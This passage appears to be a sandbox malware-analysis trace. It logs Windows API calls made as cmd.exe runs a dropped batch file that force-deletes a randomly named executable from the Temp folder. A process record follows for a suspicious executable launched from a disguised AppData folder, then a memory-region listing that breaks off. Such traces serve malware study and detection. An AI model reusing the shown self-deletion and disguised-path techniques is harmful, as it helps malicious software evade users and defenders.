lpWideCharStr=0x4a11c640, cchWideChar=8191 | out: lpWideCharStr="del /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\"\r\n") returned 62 [0102.957] _get_osfhandle (_FileHandle=3) returned 0x54 [0102.957] GetFileType (hFile=0x54) returned 0x1 [0102.957] _get_osfhandle (_FileHandle=3) returned 0x54 [0102.957] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0102.958] _tell (_FileHandle=3) returned 83 [0102.958] _close (_FileHandle=3) returned 0 [0102.959] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x22f4f4 | out: _Buffer="\r\n") returned 2 [0102.959] _get_osfhandle (_FileHandle=1) returned 0x7 [0102.959] GetFileType (hFile=0x7) returned 0x2 [0102.959] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0102.959] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f4b4 | out: lpMode=0x22f4b4) returned 1 [0102.959] _get_osfhandle (_FileHandle=1) returned 0x7 [0102.959] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x22f4e0, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x22f4e0*=0x2) returned 1 [0102.959] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0102.959] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0102.959] _vsnwprintf (in: _Buffer=0x4a115e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x22f4f0 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0102.960] _vsnwprintf (in: _Buffer=0x4a115e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x22f4f0 | out: _Buffer=">") returned 1 [0102.960] _get_osfhandle (_FileHandle=1) returned 0x7 [0102.960] GetFileType (hFile=0x7) returned 0x2 [0102.960] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0102.960] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f4b8 | out: lpMode=0x22f4b8) returned 1 [0102.960] _get_osfhandle (_FileHandle=1) returned 0x7 [0102.960] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a115e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x22f4e4, lpReserved=0x0 | out: lpBuffer=0x4a115e40*, lpNumberOfCharsWritten=0x22f4e4*=0x19) returned 1 [0102.960] _get_osfhandle (_FileHandle=1) returned 0x7 [0102.960] GetFileType (hFile=0x7) returned 0x2 [0102.960] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0102.960] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f73c | out: lpMode=0x22f73c) returned 1 [0102.961] _get_osfhandle (_FileHandle=1) returned 0x7 [0102.961] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x39f008*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x22f768, lpReserved=0x0 | out: lpBuffer=0x39f008*, lpNumberOfCharsWritten=0x22f768*=0x3) returned 1 [0102.961] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x22f774 | out: _Buffer=" /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" ") returned 58 [0102.961] _get_osfhandle (_FileHandle=1) returned 0x7 [0102.961] GetFileType (hFile=0x7) returned 0x2 [0102.961] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0102.961] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f734 | out: lpMode=0x22f734) returned 1 [0102.961] _get_osfhandle (_FileHandle=1) returned 0x7 [0102.961] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x3a, lpNumberOfCharsWritten=0x22f760, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x22f760*=0x3a) returned 1 [0102.961] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x22f794 | out: _Buffer="\r\n") returned 2 [0102.962] _get_osfhandle (_FileHandle=1) returned 0x7 [0102.962] GetFileType (hFile=0x7) returned 0x2 [0102.962] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0102.962] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f754 | out: lpMode=0x22f754) returned 1 [0102.962] _get_osfhandle (_FileHandle=1) returned 0x7 [0102.962] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x22f780, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x22f780*=0x2) returned 1 [0102.962] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0102.962] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0102.962] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0102.962] GetConsoleTitleW (in: lpConsoleTitle=0x22f304, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0102.963] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x22f0bc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0102.963] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x22e14c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0102.963] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x22e37c, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x22e380, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x22e37c*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0102.963] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0102.963] _wcsicmp (_String1="CNuu8Vyt.exe", _String2=".") returned 53 [0102.963] _wcsicmp (_String1="CNuu8Vyt.exe", _String2="..") returned 53 [0102.963] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\cnuu8vyt.exe")) returned 0x2020 [0102.963] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x392148 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0102.963] SetErrorMode (uMode=0x0) returned 0x0 [0102.963] SetErrorMode (uMode=0x1) returned 0x0 [0102.963] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe", nBufferLength=0x104, lpBuffer=0x22e7a0, lpFilePart=0x22e788 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe", lpFilePart=0x22e788*="CNuu8Vyt.exe") returned 0x30 [0102.964] SetErrorMode (uMode=0x0) returned 0x1 [0102.964] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp")) returned 0x2010 [0102.964] _wcsicmp (_String1="CNuu8Vyt.exe", _String2=".") returned 53 [0102.964] _wcsicmp (_String1="CNuu8Vyt.exe", _String2="..") returned 53 [0102.964] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\cnuu8vyt.exe")) returned 0x2020 [0102.964] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe", fInfoLevelId=0x0, lpFindFileData=0x3a0554, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3a0554) returned 0x380aa8 [0102.964] DeleteFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\cnuu8vyt.exe")) returned 1 [0102.965] FindNextFileW (in: hFindFile=0x380aa8, lpFindFileData=0x3a0554 | out: lpFindFileData=0x3a0554) returned 0 [0102.965] GetLastError () returned 0x12 [0102.965] FindClose (in: hFindFile=0x380aa8 | out: hFindFile=0x380aa8) returned 1 [0102.966] _get_osfhandle (_FileHandle=1) returned 0x7 [0102.966] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0102.966] _get_osfhandle (_FileHandle=1) returned 0x7 [0102.966] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0102.966] _get_osfhandle (_FileHandle=0) returned 0x3 [0102.966] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0102.966] SetConsoleInputExeNameW () returned 0x1 [0102.966] GetConsoleOutputCP () returned 0x1b5 [0102.967] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0102.967] SetThreadUILanguage (LangId=0x0) returned 0x409 [0102.967] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\DGaezHhx.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\dgaezhhx.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x22f73c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0102.967] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0102.967] _get_osfhandle (_FileHandle=3) returned 0x54 [0102.967] SetFilePointer (in: hFile=0x54, lDistanceToMove=83, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0102.967] _get_osfhandle (_FileHandle=3) returned 0x54 [0102.967] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0102.967] ReadFile (in: hFile=0x54, lpBuffer=0x4a116640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x22f720, lpOverlapped=0x0 | out: lpBuffer=0x4a116640*, lpNumberOfBytesRead=0x22f720*=0x3e, lpOverlapped=0x0) returned 1 [0102.967] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a116640, cbMultiByte=62, lpWideCharStr=0x4a11c640, cchWideChar=8191 | out: lpWideCharStr="del /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\"\r\n") returned 62 [0102.967] _get_osfhandle (_FileHandle=3) returned 0x54 [0102.967] GetFileType (hFile=0x54) returned 0x1 [0102.968] _get_osfhandle (_FileHandle=3) returned 0x54 [0102.968] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0102.969] _tell (_FileHandle=3) returned 145 [0102.969] _close (_FileHandle=3) returned 0 [0102.969] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x22f4f4 | out: _Buffer="\r\n") returned 2 [0102.969] _get_osfhandle (_FileHandle=1) returned 0x7 [0102.969] GetFileType (hFile=0x7) returned 0x2 [0102.969] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0102.969] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f4b4 | out: lpMode=0x22f4b4) returned 1 [0102.969] _get_osfhandle (_FileHandle=1) returned 0x7 [0102.969] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x22f4e0, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x22f4e0*=0x2) returned 1 [0102.970] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0102.970] _vsnwprintf (in: _Buffer=0x4a115e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x22f4f0 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0102.970] _vsnwprintf (in: _Buffer=0x4a115e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x22f4f0 | out: _Buffer=">") returned 1 [0102.970] _get_osfhandle (_FileHandle=1) returned 0x7 [0102.970] GetFileType (hFile=0x7) returned 0x2 [0102.970] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0102.970] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f4b8 | out: lpMode=0x22f4b8) returned 1 [0102.970] _get_osfhandle (_FileHandle=1) returned 0x7 [0102.970] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a115e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x22f4e4, lpReserved=0x0 | out: lpBuffer=0x4a115e40*, lpNumberOfCharsWritten=0x22f4e4*=0x19) returned 1 [0102.970] _get_osfhandle (_FileHandle=1) returned 0x7 [0102.970] GetFileType (hFile=0x7) returned 0x2 [0102.971] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0102.971] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f73c | out: lpMode=0x22f73c) returned 1 [0102.971] _get_osfhandle (_FileHandle=1) returned 0x7 [0102.971] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x39f008*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x22f768, lpReserved=0x0 | out: lpBuffer=0x39f008*, lpNumberOfCharsWritten=0x22f768*=0x3) returned 1 [0102.971] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x22f774 | out: _Buffer=" /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" ") returned 58 [0102.971] _get_osfhandle (_FileHandle=1) returned 0x7 [0102.971] GetFileType (hFile=0x7) returned 0x2 [0102.971] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0102.971] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f734 | out: lpMode=0x22f734) returned 1 [0102.971] _get_osfhandle (_FileHandle=1) returned 0x7 [0102.971] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x3a, lpNumberOfCharsWritten=0x22f760, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x22f760*=0x3a) returned 1 [0102.972] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x22f794 | out: _Buffer="\r\n") returned 2 [0102.972] _get_osfhandle (_FileHandle=1) returned 0x7 [0102.972] GetFileType (hFile=0x7) returned 0x2 [0102.972] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0102.972] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f754 | out: lpMode=0x22f754) returned 1 [0102.972] _get_osfhandle (_FileHandle=1) returned 0x7 [0102.972] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x22f780, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x22f780*=0x2) returned 1 [0102.972] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0102.972] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0102.972] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0102.972] GetConsoleTitleW (in: lpConsoleTitle=0x22f304, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0102.973] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x22f0bc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0102.973] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x22e14c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0102.973] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x22e37c, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x22e380, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x22e37c*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0102.973] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0102.973] _wcsicmp (_String1="CNuu8Vyt.exe", _String2=".") returned 53 [0102.973] _wcsicmp (_String1="CNuu8Vyt.exe", _String2="..") returned 53 [0102.973] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\cnuu8vyt.exe")) returned 0xffffffff [0102.973] GetLastError () returned 0x2 [0102.973] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x392148 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0102.973] SetErrorMode (uMode=0x0) returned 0x0 [0102.973] SetErrorMode (uMode=0x1) returned 0x0 [0102.974] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe", nBufferLength=0x104, lpBuffer=0x22e7a0, lpFilePart=0x22e788 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe", lpFilePart=0x22e788*="CNuu8Vyt.exe") returned 0x30 [0102.974] SetErrorMode (uMode=0x0) returned 0x1 [0102.974] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp")) returned 0x2010 [0102.974] _wcsicmp (_String1="CNuu8Vyt.exe", _String2=".") returned 53 [0102.974] _wcsicmp (_String1="CNuu8Vyt.exe", _String2="..") returned 53 [0102.974] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\cnuu8vyt.exe")) returned 0xffffffff [0102.974] GetLastError () returned 0x2 [0102.974] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe", fInfoLevelId=0x0, lpFindFileData=0x3a0554, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3a0554) returned 0xffffffff [0102.974] GetLastError () returned 0x2 [0102.974] _get_osfhandle (_FileHandle=2) returned 0xb [0102.974] GetFileType (hFile=0xb) returned 0x2 [0102.974] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0102.974] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x22ed7c | out: lpMode=0x22ed7c) returned 1 [0102.975] _get_osfhandle (_FileHandle=2) returned 0xb [0102.975] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x22edb0 | out: lpConsoleScreenBufferInfo=0x22edb0) returned 1 [0102.975] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a124640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0102.975] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a124640, nSize=0x2000, Arguments=0x22edf0 | out: lpBuffer="Could Not Find C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\r\n") returned 0x41 [0102.975] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x41, lpNumberOfCharsWritten=0x22edd4, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x22edd4*=0x41) returned 1 [0102.976] _get_osfhandle (_FileHandle=1) returned 0x7 [0102.976] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0102.976] _get_osfhandle (_FileHandle=1) returned 0x7 [0102.976] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0102.976] _get_osfhandle (_FileHandle=0) returned 0x3 [0102.976] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0102.977] SetConsoleInputExeNameW () returned 0x1 [0102.977] GetConsoleOutputCP () returned 0x1b5 [0102.977] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0102.977] SetThreadUILanguage (LangId=0x0) returned 0x409 [0102.977] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\DGaezHhx.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\dgaezhhx.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x22f73c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0102.977] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0102.977] _get_osfhandle (_FileHandle=3) returned 0x54 [0102.977] SetFilePointer (in: hFile=0x54, lDistanceToMove=145, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0102.977] _get_osfhandle (_FileHandle=3) returned 0x54 [0102.978] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0102.978] ReadFile (in: hFile=0x54, lpBuffer=0x4a116640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x22f720, lpOverlapped=0x0 | out: lpBuffer=0x4a116640*, lpNumberOfBytesRead=0x22f720*=0x0, lpOverlapped=0x0) returned 1 [0102.978] GetLastError () returned 0x0 [0102.978] _get_osfhandle (_FileHandle=3) returned 0x54 [0102.978] GetFileType (hFile=0x54) returned 0x1 [0102.978] _get_osfhandle (_FileHandle=3) returned 0x54 [0102.978] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0102.978] _get_osfhandle (_FileHandle=3) returned 0x54 [0102.978] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0102.978] ReadFile (in: hFile=0x54, lpBuffer=0x4a116640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x22f704, lpOverlapped=0x0 | out: lpBuffer=0x4a116640*, lpNumberOfBytesRead=0x22f704*=0x0, lpOverlapped=0x0) returned 1 [0102.978] GetLastError () returned 0x0 [0102.978] _get_osfhandle (_FileHandle=3) returned 0x54 [0102.978] GetFileType (hFile=0x54) returned 0x1 [0102.978] _get_osfhandle (_FileHandle=3) returned 0x54 [0102.978] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0102.978] longjmp () [0102.978] _tell (_FileHandle=3) returned 145 [0102.979] _close (_FileHandle=3) returned 0 [0102.979] CmdBatNotification () returned 0x0 [0102.979] _get_osfhandle (_FileHandle=1) returned 0x7 [0102.979] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0102.979] _get_osfhandle (_FileHandle=1) returned 0x7 [0102.979] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0102.979] _get_osfhandle (_FileHandle=0) returned 0x3 [0102.979] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0102.979] SetConsoleInputExeNameW () returned 0x1 [0102.979] GetConsoleOutputCP () returned 0x1b5 [0102.980] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0102.980] SetThreadUILanguage (LangId=0x0) returned 0x409 [0102.980] exit (_Code=0) Process: id = "19" image_name = "lsfkrhur.exe" filename = "c:\\users\\eebsym5\\appdata\\roaming\\micros~1\\lsfkrhur.exe" page_root = "0x7ea168e0" os_pid = "0xba4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "12" os_parent_pid = "0xb34" cmd_line = "\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Sypykbck.exe\" 1" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1294 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1295 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1296 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 1297 start_va = 0x400000 end_va = 0x481fff entry_point = 0x400000 region_type = mapped_file name = "lsfkrhur.exe" filename = "\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\micros~1\\lsfkrhur.exe") Region: id = 1298 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1299 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1300 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1301 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 1302 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1303 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1304 start_va = 0x160000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 1305 start_va = 0x260000 end_va = 0x2c6fff entry_point = 0x260000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1306 start_va = 0x2f0000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 1307 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1308 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1309 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1310 start_va = 